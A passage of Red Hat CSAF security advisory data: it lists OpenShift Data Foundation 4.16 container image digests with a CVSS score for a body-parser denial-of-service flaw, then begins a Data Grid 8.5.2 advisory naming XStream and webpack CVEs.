"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "body-parser: Denial of Service Vulnerability in body-parser"
}
]
}
RHSA-2024_10214
Vulnerability from csaf_redhat - Published: 2024-11-25 16:56 - Updated: 2024-12-17 18:59Summary
Red Hat Security Advisory: Red Hat Data Grid 8.5.2 security update
Notes
Topic
An update for Red Hat Data Grid 8 is now available.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.
Data Grid 8.5.2 replaces Data Grid 8.5.1 and includes bug fixes and enhancements. Find out more about Data Grid 8.5.2 in the Release Notes[3].
Security Fix(es):
* CVE-2024-47072 com.thoughtworks.xstream/xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream [jdg-8] (CVE-2024-47072)
* CVE-2024-43788 webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule [jdg-8] (CVE-2024-43788)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for Red Hat Data Grid 8 is now available.\n \nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
